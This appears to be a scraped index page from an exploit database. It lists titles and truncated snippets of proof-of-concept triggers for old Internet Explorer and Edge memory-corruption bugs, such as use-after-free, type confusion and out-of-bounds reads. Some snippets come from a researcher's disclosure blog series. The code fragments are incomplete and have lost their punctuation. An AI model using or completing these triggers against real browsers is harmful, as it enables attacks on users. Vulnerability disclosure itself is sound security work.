Microsoft Internet Explorer - textarea.defaultValue Memory Disclosure (MS17-006) Exploit

Exploit for windows platform in category dos / poc function run var textarea = document.getElementById"textarea"; var frame = document.createElement"iframe"; textarea.appendChildframe; frame.contentDocument.onreadystatechange = eventhandler; form.reset; function eventhandler...

Microsoft Edge / Internet Explorer HandleColumnBreakOnColumnSpanningElement Type Confusion Exploit

Microsoft Edge and Internet Explorer suffer from a type confusion in HandleColumnBreakOnColumnSpanningElement. Microsoft Edge and IE: Type confusion in HandleColumnBreakOnColumnSpanningElement CVE-2017-0037 PoC: .class1 float: left; column-count: 5; .class2 column-span: all; columns: 1px; table...

Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056)

Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow MS14-056 Security Settings - Choose a zone - Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same...

Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056)

Security Settings - Choose a zone - Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same effect. Please note that neither option prevents a website from social engineering the user into typing a...

Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)

Exploit for windows platform in category dos / poc document.add­Event­Listener"DOMNode­Removed", function document.open; // free // attempt to modify freed memory here // because it will be reused after th...

Microsoft Internet Explorer 9 MSHTML - CMarkup::Reload­In­Compat­View Use-After-Free Exploit

Exploit for windows platform in category dos / poc document.design­Mode = "on"; !-- Details By switching the a document's design­Mode property to on in a deferred script, MSIE 9 can be made to reload a web page using CMarkup::Reload­In­Compat­View. This method calls CDoc::Compat­View­Refresh, whi...

Microsoft Internet Explorer 9 - MSHTML CMarkup::Reload­In­Compat­View Use-After-Free

Microsoft Internet Explorer 9 - MSHTML CMarkup::Reload­In­Compat­View Use-After-Free document.design­Mode = "on"; !-- Details By switching the a document's design­Mode property to on in a deferred script, MSIE 9 can be made to reload a web page using CMarkup::Reload­In­Compat­View. This method...

Microsoft Internet Explorer 9 - MSHTML CMarkup::Reload­In­Compat­View Use-After-Free

document.design­Mode = "on"; !-- Details By switching the a document's design­Mode property to on in a deferred script, MSIE 9 can be made to reload a web page using CMarkup::Reload­In­Compat­View. This method calls CDoc::Compat­View­Refresh, which indirectly calls...

Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption Exploit

Exploit for windows platform in category dos / poc // First tag can be any inline but must NOT be closed yet // Second tag can be anything that's not inline. // "text1" can be anything document.write'text1'; // The tree is in good shape. show"DOM Tree after first write",...

Microsoft Internet Explorer 9 MSHTML - CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (1)

Exploit for windows platform in category dos / poc window.onload=functionlocation.reload;; text .float float:left; .zoom zoom:3000%; .border::first-let...

Microsoft Internet Explorer 9 - MSHTML CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (1)

Microsoft Internet Explorer 9 - MSHTML CDisp­Node::Insert­Sibling­Node Use-After-Free MS13-037 1 window.onload=functionlocation.reload;; text .float float:left; .zoom zoom:3000%; .border::first-letter...

Microsoft Internet Explorer MSHTML CDispNode::InsertSiblingNode Use-After-Free

Since November I have been releasing details on all vulnerabilities I found that I have not released before. This is the twenty-seventh entry in the series. This information is available in more detail on my blog at http://blog.skylined.nl/20161207001.html. There you can find a repro that trigger...

Microsoft Internet Explorer 9 MSHTML CDispNode::InsertSiblingNode Use-After-Free

Since November I have been releasing details on all vulnerabilities I found that I have not released before. This is the twenty-eighth entry in the series. This information is available in more detail on my blog at http://blog.skylined.nl/20161208001.html. There you can find a repro that triggere...

Microsoft Internet Explorer 8 MSHTML - SRun­Pointer::Span­Qualifier/Run­Type Out-Of-Bounds Read (MS1

Exploit for windows platform in category dos / poc position­fixed position: fixed; position­relative position: relative; float­left float: left; complex float: left; width: 100%; complex:first-line clear: left; window.onload = function boom o­Element­float­left =...

Microsoft Internet Explorer 10 MSHTML - CEdit­Adorner::Detach Use-After-Free (MS13-047) Exploit

Exploit for windows platform in category dos / poc var o­Window = window.open"window.xhtml"; set­Intervalfunction try o­Window.eval"" + function document.design­Mode = "on"; document.exec­Command"Select­All"; var o­Selection = window.get­Selection; o­Selection.collapsedocument,1;...

Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - DOMImplementation Type Confusion Exploit

Exploit for windows platform in category dos / poc Source: http://blog.skylined.nl/20161128001.html Synopsis A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be executed with a stack layout it does...

Microsoft Internet Explorer 8 - MSHTML SRun­Pointer::Span­QualifierRun­Type Out-Of-Bounds Read (MS15-009)

Microsoft Internet Explorer 8 - MSHTML SRun­Pointer::Span­QualifierRun­Type Out-Of-Bounds Read MS15-009 position­fixed position: fixed; position­relative position: relative; float­left float: left; complex float: left; width: 100%; complex:first-line clear: left; window.onload = function boom...

Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)

var o­Window = window.open"window.xhtml"; set­Intervalfunction try o­Window.eval"" + function document.design­Mode = "on"; document.exec­Command"Select­All"; var o­Selection = window.get­Selection; o­Selection.collapsedocument,1; document.exec­Command"Insert­Image", false;...

Microsoft Internet Explorer 8 - MSHTML 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)

position­fixed position: fixed; position­relative position: relative; float­left float: left; complex float: left; width: 100%; complex:first-line clear: left; window.onload = function boom o­Element­float­left = document.create­Element'float­left'; o­Element­complex =...

Microsoft Internet Explorer 10 MSHTML CEditAdorner::Detach Use-After-Free

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the nineteenth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these throu...